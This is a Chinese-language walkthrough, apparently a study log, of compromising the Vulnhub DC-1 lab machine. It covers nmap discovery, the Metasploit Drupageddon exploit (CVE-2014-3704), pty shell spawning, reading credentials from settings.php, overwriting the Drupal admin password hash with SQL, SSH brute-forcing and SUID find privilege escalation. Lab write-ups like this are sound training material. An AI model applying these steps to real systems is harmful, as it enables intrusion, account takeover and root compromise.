Vulnhub靶机渗透学习记录：DC-1

环境搭建

1. 攻击机：Kali-Linux2020.4（VmwareWorkstation

2. 靶机：DC-1（VirtualBox）

3. DC-1靶机下载链接：https://www.vulnhub.com/entry/dc-1-1,292/.

4. 两台虚拟机配置桥接模式，并桥接到同一张网卡
   
   

5. 开启两台虚拟机，DC-1正常启动后如下图：
   

6. 打开kali，ifconfig查看kali的IP地址

7. 使用nmap查看该网段存活主机，也可使用arp-scan扫描

   nmap -sn 192.168.43.0/24
   或者
   sudo arp-scan -l
   

   nmap扫描，成功找到DC-1IP地址：
   
   arp-scan扫描将结果：
   

8. IP地址
   攻击机：Kali-Linux2020.4：192.168.43.251
   靶机：DC-1：192.168.43.210

flag1

1. nmap探测端口和版本探测：
   bash sudo nmap -sS -sV 192.168.43.210
   
   使用nmap脚本扫描常见漏洞(耗时且发送请求较多，可跳过到下一步)
   bash namp --script=vuln 192.168.43.210
   nmap探测出80端口存在CVE可以利用，此处转下一步

2. 信息收集
   直接访问192.168.43.210:80,进入如下页面
   
   Wappalyzer识别出该网站是Drupal CMS
   
   启动msf搜索相关CMS相关漏洞，此处可以搜索nmap探测出的CVE，也可直接搜索Drupal找最新的漏洞进行利用
   搜索CVE
   
   或者搜索Drupal
   
   任选最新的或者nmap扫描到的漏洞进行利用（此处选择nmap扫到的）

   msf6 > search CVE-2014-3704
   # 或者
   msf6 > search Drupal
   	
   # use 序号    选择要利用的漏洞
   msf6 > use 0
   	
   # show options  查看需要设置的参数
   msf6 exploit(multi/http/drupal_drupageddon) > show options
   

   

   # set RHOSTS 目标IP   设置目标
   # set RPORT 80    设置目标端口
   msf6 exploit(multi/http/drupal_drupageddon) > set RHOSTS 192.168.43.210
   msf6 exploit(multi/http/drupal_drupageddon) > set RPORT 80
   

   如图：
   

   设置完成后，输入run或exploit开始使用该模块

   msf6 exploit(multi/http/drupal_drupageddon) > run
   

   攻击成功，输入shell获取到shell，没有命令提示符，直接输入命令即可，输入ls，可以看到flag1.txt，查看

   meterpreter > shell
   ls
   cat flag1.txt
   

   
   

   flag1提示去查看CMS的配置文件。

3. 获取交互式shell
   此处参考博文链接：
   http://saucer-man.com/information_security/233.html
   https://www.cnblogs.com/wqf1/p/14005190.html
   输入python -v命令看到该系统安装了python，可以使用python来获取交互式shell，输入
   bash python -c 'import pty;pty.spawn("/bin/bash")'
   
   成功获取到交互式shell

flag2

1. 查看配置文件
   百度得知Drupal的配置文件在如下位置：
   /sites/default/settings.php
   在此文件中，获取到mysql数据库的账号密码
   
   获取到flag2

flag3

1. 登陆MySQL数据库，查询信息

   MySQL常用命令：

   mysql -uusername -p 输入密码按登录mysql
   show databases; 查看有哪些数据库
   use dbname; 选择数据库
   show tables；查看这个库有哪些表
   desc tablename; 查看某个表的详细信息，包括列名。
   

   查看数据库
   
   查看drupaldb数据库中的表，看到一张users表
   
   查看users表的列名
   
   查询出相关用户数据（test为尝试注册时写入的）
   

2. 找登录密码
   接下来的方法是破解或者更新admin账户的密码，但在此处遇到问题，admin的密码是经过加密的，加密方法未知，所以进行搜索，发现drupal 7采用的已不是MD5，/var/www/includes/password.inc 文件中是其加密方法，但利用其生成一个新密码较为繁琐，所以采用其他方法：

   • CMS根目录下，存在一个scripts目录，该目录存放着一些脚本工具，提供给开发者使用，其中password-hash.sh这个脚本便是用来生成网站特定密码hash的工具，可以使用其生成一个密码hash，更新到数据库。
   • 网络搜索该CMS忘记密码的处理方法，如重置密码的方法，生成密码的方法，可以获取到别人已经生成的密码hash来直接使用，如密码password与其对应值：

     password
     $S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4
     

   此处采用scripts下的脚本来尝试生成密码hash，使用方法如下：

   	www-data@DC-1:/var/www$php scripts/password-hash.sh password
   	password: password              hash: $S$D5FfG.gXE8USlSsYnWor24s5f2TcJJCMUMGUvOetQzeHw3yky6cf
   

   
   连接数据库，更新admin的密码

   update users set pass="$S$D5FfG.gXE8USlSsYnWor24s5f2TcJJCMUMGUvOetQzeHw3yky6cf" where name="admin";
   

   

   使用admin/password(以上两个密码hash都有效) 登陆网站，成功获取到flag3
   

flag4

1. 爆破flag4账户
   在之前获取到shell后，查看/etc/passwd文件便发现存在一个名为flag4的用户，由于主机开放了22端口，所以当时就尝试了对SSH的爆破，也成功爆破出了flag4的密码orange，并能成功登陆，在其家目录下可以查看flag4。

   ssh 用户名@主机地址   -p 指定端口（默认22） -X 启动图形界面
   

   

2. 也可直接查看/home/flag4/flag4.txt也可以
   

flag5

1. 权限提升
   根据flag4的提示，flag5应该在root的家目录下，但访问root的家目录就需要root权限，所以此处进行权限提升。
   
   根据flag3的提示，需要使用 -exec来进行提权，查找具有root权限的SUID的文件，可使用以下命令：

   find / -user root -perm -4000 -print 2>/dev/null
   find / -perm -u=s -type f 2>/dev/null
   find / -user root -perm -4000 -exec ls -ldb {
          } \;
   

   
   可以使用find来执行命令

   find flag1.txt -exec "whoami" \;
   find flag1.txt -exec "/bin/sh" \;
   

   

参考链接

https://www.cnblogs.com/chalan630/p/12639911.html.
https://mp.weixin.qq.com/s/iaBfOS2oMS-rxPl1Qa7xqg.